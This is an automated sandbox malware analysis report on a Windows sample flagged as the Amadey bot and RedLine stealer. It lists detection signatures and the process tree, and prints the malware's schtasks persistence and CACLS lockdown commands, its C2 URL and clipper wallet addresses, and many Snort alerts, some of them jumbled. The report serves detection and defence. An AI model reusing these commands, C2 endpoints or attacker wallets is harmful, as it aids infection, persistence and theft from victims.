Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 800983
MD5: f4b906685385629998faa352a94a2e1f
SHA1: 97ebb6ba0f496f6cabdec20d5c8af07495a00e15
SHA256: 49d5e821c721205ae44d6ef76450b6a1307e06308900065d18ebad11c6abe74f
Tags: exe

Detection

Amadey, RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Yara detected Amadey's stealer DLL
Detected unpacking (overwrites its own PE header)
Yara detected Amadey bot
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected Amadey's Clipper DLL
Disable Windows Defender real time protection (registry)
Machine Learning detection for sample
Contains functionality to inject code into remote processes
Uses schtasks.exe or at.exe to add and modify task schedules
Disable Windows Defender notifications (registry)
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Binary contains a suspicious time stamp
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Uses cacls to modify the permissions of files
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • file.exe (PID: 616 cmdline: C:\Users\user\Desktop\file.exe MD5: F4B906685385629998FAA352A94A2E1F)
    • bPsg.exe (PID: 984 cmdline: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\bPsg.exe MD5: F0D05D7896B3839E5CFBCC78E4FD87FF)
      • aPsf.exe (PID: 4764 cmdline: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\aPsf.exe MD5: 5DD55AE0E5CCD8EF2E82679ED0FC11C9)
      • nika.exe (PID: 604 cmdline: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\nika.exe MD5: 7E93BACBBC33E6652E147E7FE07572A0)
    • xriv.exe (PID: 3596 cmdline: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
      • mnolyk.exe (PID: 6136 cmdline: "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe" MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
        • schtasks.exe (PID: 6024 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 6068 cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 768 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cacls.exe (PID: 4204 cmdline: CACLS "mnolyk.exe" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cacls.exe (PID: 4812 cmdline: CACLS "mnolyk.exe" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cmd.exe (PID: 3104 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cacls.exe (PID: 5312 cmdline: CACLS "..\4b9a106e76" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
          • cacls.exe (PID: 4012 cmdline: CACLS "..\4b9a106e76" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
        • rundll32.exe (PID: 1248 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • rundll32.exe (PID: 5316 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 4736 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • mnolyk.exe (PID: 4664 cmdline: C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • mnolyk.exe (PID: 5432 cmdline: C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • mnolyk.exe (PID: 2848 cmdline: C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • mnolyk.exe (PID: 5764 cmdline: C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe MD5: 8BB923C4D81284DAEF7896E5682DF6C6)
  • cleanup
{"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
{"Wallet Addresses": ["bc1qslzv7hczpsatc8lq285gy38r4af0c3alsc4m77", "0x89E34Ee2016a5E5a97b5E9598C251D2a2746Ba0D", "LdYspWr6nkQ3ZNNTsmba77u4frHDhji1Nv", "DBjzffi3umhLQbUGLRoNQwZ4pjoKyNFahf", "42zbZM5ozb4iDSN7hxNnQ1DSAvEmGY3z2KvAYmMxSJkUCc5bJyJ5hdkUu4324VJx8ACcDJJXg2NbRdWVcDyS87tyLikjVVJ"]}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Amadey | Yara detected Amadey bot | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dll | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security |
C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |

Source | Rule | Description | Author | Strings
00000021.00000002.712917292.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000021.00000000.712317333.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
0000000F.00000002.776200491.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
0000000F.00000000.321018621.00000000001B1000.00000020.00000001.01000000.0000000A.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
0000000E.00000002.321481606.0000000001201000.00000020.00000001.01000000.00000009.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |

Source | Rule | Description | Author | Strings
2.3.aPsf.exe.690000.0.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
2.3.aPsf.exe.690000.0.raw.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen |
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
0.3.file.exe.475dc20.0.raw.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
0.3.file.exe.475dc20.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
2.2.aPsf.exe.400000.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |

No Sigma rule has matched
Timestamp: 02/07/23-23:07:30.643129
Source IP: 192.168.2.7
Destination IP: 62.204.41.4
SID: 2027700
Source Port: 49808
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450020802027700 02/07/23-23:08:29.489590
                              SID:2027700
                              Source Port:50020
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449938802027700 02/07/23-23:08:06.973604
                              SID:2027700
                              Source Port:49938
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450058802027700 02/07/23-23:08:40.571514
                              SID:2027700
                              Source Port:50058
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450067802027700 02/07/23-23:08:42.809418
                              SID:2027700
                              Source Port:50067
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449880802027700 02/07/23-23:07:49.880282
                              SID:2027700
                              Source Port:49880
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449864802027700 02/07/23-23:07:45.902188
                              SID:2027700
                              Source Port:49864
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450214802027700 02/07/23-23:09:21.511864
                              SID:2027700
                              Source Port:50214
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449947802027700 02/07/23-23:08:09.176994
                              SID:2027700
                              Source Port:49947
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450140802027700 02/07/23-23:09:01.270109
                              SID:2027700
                              Source Port:50140
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450296802027700 02/07/23-23:09:43.846361
                              SID:2027700
                              Source Port:50296
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450131802027700 02/07/23-23:08:59.066086
                              SID:2027700
                              Source Port:50131
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450401802027700 02/07/23-23:10:09.526189
                              SID:2027700
                              Source Port:50401
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450086802027700 02/07/23-23:08:47.567671
                              SID:2027700
                              Source Port:50086
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449919802027700 02/07/23-23:08:02.303851
                              SID:2027700
                              Source Port:49919
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450299802027700 02/07/23-23:09:44.598785
                              SID:2027700
                              Source Port:50299
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450169802027700 02/07/23-23:09:10.009649
                              SID:2027700
                              Source Port:50169
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449991802027700 02/07/23-23:08:22.396521
                              SID:2027700
                              Source Port:49991
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450039802027700 02/07/23-23:08:34.413705
                              SID:2027700
                              Source Port:50039
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450112802027700 02/07/23-23:08:54.333220
                              SID:2027700
                              Source Port:50112
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449966802027700 02/07/23-23:08:13.888624
                              SID:2027700
                              Source Port:49966
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449753802027700 02/07/23-23:07:15.610893
                              SID:2027700
                              Source Port:49753
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449706802027700 02/07/23-23:07:04.472246
                              SID:2027700
                              Source Port:49706
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449836802027700 02/07/23-23:07:38.152613
                              SID:2027700
                              Source Port:49836
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450325802027700 02/07/23-23:09:51.040294
                              SID:2027700
                              Source Port:50325
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450242802027700 02/07/23-23:09:30.589447
                              SID:2027700
                              Source Port:50242
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450455802027700 02/07/23-23:10:24.593085
                              SID:2027700
                              Source Port:50455
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450372802027700 02/07/23-23:10:02.525802
                              SID:2027700
                              Source Port:50372
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449900802027700 02/07/23-23:07:54.774755
                              SID:2027700
                              Source Port:49900
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450323802027700 02/07/23-23:09:50.536075
                              SID:2027700
                              Source Port:50323
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449961802027700 02/07/23-23:08:12.685375
                              SID:2027700
                              Source Port:49961
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450032802027700 02/07/23-23:08:32.408441
                              SID:2027700
                              Source Port:50032
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450384802027700 02/07/23-23:10:05.420068
                              SID:2027700
                              Source Port:50384
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449722802027700 02/07/23-23:07:08.360519
                              SID:2027700
                              Source Port:49722
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449878802027700 02/07/23-23:07:49.349230
                              SID:2027700
                              Source Port:49878
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450127802027700 02/07/23-23:08:58.089434
                              SID:2027700
                              Source Port:50127
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449750802027700 02/07/23-23:07:14.882617
                              SID:2027700
                              Source Port:49750
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449704802027700 02/07/23-23:07:03.968547
                              SID:2027700
                              Source Port:49704
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450050802027700 02/07/23-23:08:38.652718
                              SID:2027700
                              Source Port:50050
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449737802027700 02/07/23-23:07:12.033255
                              SID:2027700
                              Source Port:49737
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450004802027700 02/07/23-23:08:25.569822
                              SID:2027700
                              Source Port:50004
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450341802027700 02/07/23-23:09:54.975800
                              SID:2027700
                              Source Port:50341
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450356802027700 02/07/23-23:09:58.629045
                              SID:2027700
                              Source Port:50356
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449994802027700 02/07/23-23:08:23.133003
                              SID:2027700
                              Source Port:49994
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450145802027700 02/07/23-23:09:02.533585
                              SID:2027700
                              Source Port:50145
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449793802027700 02/07/23-23:07:27.063291
                              SID:2027700
                              Source Port:49793
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449933802027700 02/07/23-23:08:05.759793
                              SID:2027700
                              Source Port:49933
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450418802027700 02/07/23-23:10:13.656697
                              SID:2027700
                              Source Port:50418
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449755802027700 02/07/23-23:07:16.092892
                              SID:2027700
                              Source Port:49755
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450469802027700 02/07/23-23:10:28.062597
                              SID:2027700
                              Source Port:50469
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450155802027700 02/07/23-23:09:04.977918
                              SID:2027700
                              Source Port:50155
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449951802027700 02/07/23-23:08:10.180584
                              SID:2027700
                              Source Port:49951
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450060802027700 02/07/23-23:08:41.073047
                              SID:2027700
                              Source Port:50060
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449827802027700 02/07/23-23:07:35.253285
                              SID:2027700
                              Source Port:49827
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450351802027700 02/07/23-23:09:57.406628
                              SID:2027700
                              Source Port:50351
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449732802027700 02/07/23-23:07:10.829866
                              SID:2027700
                              Source Port:49732
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450328802027700 02/07/23-23:09:51.766213
                              SID:2027700
                              Source Port:50328
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450178802027700 02/07/23-23:09:12.666182
                              SID:2027700
                              Source Port:50178
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450374802027700 02/07/23-23:10:02.999700
                              SID:2027700
                              Source Port:50374
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449810802027700 02/07/23-23:07:31.110999
                              SID:2027700
                              Source Port:49810
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450173802027700 02/07/23-23:09:11.479350
                              SID:2027700
                              Source Port:50173
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449905802027700 02/07/23-23:07:57.664790
                              SID:2027700
                              Source Port:49905
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450268802027700 02/07/23-23:09:36.981445
                              SID:2027700
                              Source Port:50268
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449727802027700 02/07/23-23:07:09.536306
                              SID:2027700
                              Source Port:49727
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449709802027700 02/07/23-23:07:05.205403
                              SID:2027700
                              Source Port:49709
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450251802027700 02/07/23-23:09:32.760947
                              SID:2027700
                              Source Port:50251
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450446802027700 02/07/23-23:10:22.408033
                              SID:2027700
                              Source Port:50446
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450318802027700 02/07/23-23:09:49.262876
                              SID:2027700
                              Source Port:50318
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450346802027700 02/07/23-23:09:56.168424
                              SID:2027700
                              Source Port:50346
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449956802027700 02/07/23-23:08:11.390677
                              SID:2027700
                              Source Port:49956
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449800802027700 02/07/23-23:07:28.753249
                              SID:2027700
                              Source Port:49800
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450122802027700 02/07/23-23:08:56.823302
                              SID:2027700
                              Source Port:50122
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450278802027700 02/07/23-23:09:39.423463
                              SID:2027700
                              Source Port:50278
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450022802027700 02/07/23-23:08:30.007207
                              SID:2027700
                              Source Port:50022
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450313802027700 02/07/23-23:09:48.033865
                              SID:2027700
                              Source Port:50313
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450200802027700 02/07/23-23:09:18.098931
                              SID:2027700
                              Source Port:50200
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449760802027700 02/07/23-23:07:17.283372
                              SID:2027700
                              Source Port:49760
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449765802027700 02/07/23-23:07:19.352231
                              SID:2027700
                              Source Port:49765
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449902802027700 02/07/23-23:07:55.670942
                              SID:2027700
                              Source Port:49902
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449984802027700 02/07/23-23:08:20.651522
                              SID:2027700
                              Source Port:49984
                              SID:2027700
                              Source Port:49874
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450334802027700 02/07/23-23:09:53.217371
                              SID:2027700
                              Source Port:50334
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450363802027700 02/07/23-23:10:00.334134
                              SID:2027700
                              Source Port:50363
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450245802027700 02/07/23-23:09:31.338382
                              SID:2027700
                              Source Port:50245
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450458802027700 02/07/23-23:10:25.313774
                              SID:2027700
                              Source Port:50458
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449940802027700 02/07/23-23:08:07.464494
                              SID:2027700
                              Source Port:49940
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449785802027700 02/07/23-23:07:25.161286
                              SID:2027700
                              Source Port:49785
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450008802027700 02/07/23-23:08:26.555660
                              SID:2027700
                              Source Port:50008
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450150802027700 02/07/23-23:09:03.798728
                              SID:2027700
                              Source Port:50150
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450452802027700 02/07/23-23:10:23.844381
                              SID:2027700
                              Source Port:50452
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449969802027700 02/07/23-23:08:14.885714
                              SID:2027700
                              Source Port:49969
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450064802027700 02/07/23-23:08:42.089378
                              SID:2027700
                              Source Port:50064
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450208802027700 02/07/23-23:09:20.046231
                              SID:2027700
                              Source Port:50208
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450162802027700 02/07/23-23:09:06.685785
                              SID:2027700
                              Source Port:50162
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450119802027700 02/07/23-23:08:56.055732
                              SID:2027700
                              Source Port:50119
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449944802027700 02/07/23-23:08:08.460141
                              SID:2027700
                              Source Port:49944
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449861802027700 02/07/23-23:07:45.159848
                              SID:2027700
                              Source Port:49861
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450379802027700 02/07/23-23:10:04.185148
                              SID:2027700
                              Source Port:50379
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449855802027700 02/07/23-23:07:43.680992
                              SID:2027700
                              Source Port:49855
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
